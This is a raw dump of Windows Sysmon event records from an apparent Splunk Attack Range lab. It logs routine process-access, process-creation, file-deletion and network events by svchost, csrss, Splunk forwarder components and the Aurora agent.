12:26:29.832{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017696Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:29.832{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017695Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:29.832{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017694Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:29.832{E5A8D418-DC43-63C7-0500-00000000B002}4163684C:\Windows\system32\csrss.exe{E5A8D418-E575-63C7-2002-00000000B002}3944C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017693Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:29.832{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E575-63C7-2002-00000000B002}3944C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017692Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:29.833{E5A8D418-E575-63C7-2002-00000000B002}3944C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000017691Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:29.576{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A8DE311E15F54DF69FC29EB63C0F2F3,SHA256=B87CFC68E9B6BE1B1C1E07ADC3B63FE7564E8FA4BD8106BBA102F578C2F260E1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000045271Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:29.733{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E575-63C7-6B06-00000000AF02}1888C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045270Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:29.733{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045269Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:29.733{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045268Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:29.733{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045267Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:29.733{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045266Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:29.733{FE4C2B44-D9F3-63C7-0500-00000000AF02}4082524C:\Windows\system32\csrss.exe{FE4C2B44-E575-63C7-6B06-00000000AF02}1888C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000045265Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:29.733{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E575-63C7-6B06-00000000AF02}1888C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000045264Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:29.734{FE4C2B44-E575-63C7-6B06-00000000AF02}1888C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000045263Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:29.686{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=0831D95E693479A4A9977F7C236E0C44,SHA256=53026B485A64F6E1A1B2637B62DA44FAA0DA9190540772734486C4CDD87F45B5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000045262Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:27.154{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56419-false10.0.1.12-8089- 23542300x800000000000000045261Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:29.374{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9996B0B5AAD68B696A7C13805A35DCF4,SHA256=A4F8DB056AA548011953D734EC4C1AA5DFB13A67498E0199EEF30D389C642601,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045260Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:29.291{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=299AE154C0B1BA066E14A4FD91D3C6F7,SHA256=06410FB41C37D73F02D7E0B49E833C7578A70B4613377B7D91DCB0237056E013,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017690Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:29.222{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=5A255EA22955CEE26EC7FE4C115BBF2C,SHA256=BD0FED05639F3AB8F96A780B3B7C0636F0CB59FA1D527115BEC02188CFCE087F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000017689Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:29.199{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E575-63C7-1F02-00000000B002}2796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000017688Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:29.199{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E575-63C7-1F02-00000000B002}2796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000017687Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:29.198{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E575-63C7-1F02-00000000B002}2796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000017686Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:29.151{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E575-63C7-1F02-00000000B002}2796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017685Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:29.151{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017684Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:29.151{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017683Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:29.151{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017682Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:29.151{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017681Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:29.151{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017680Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:29.151{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017679Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 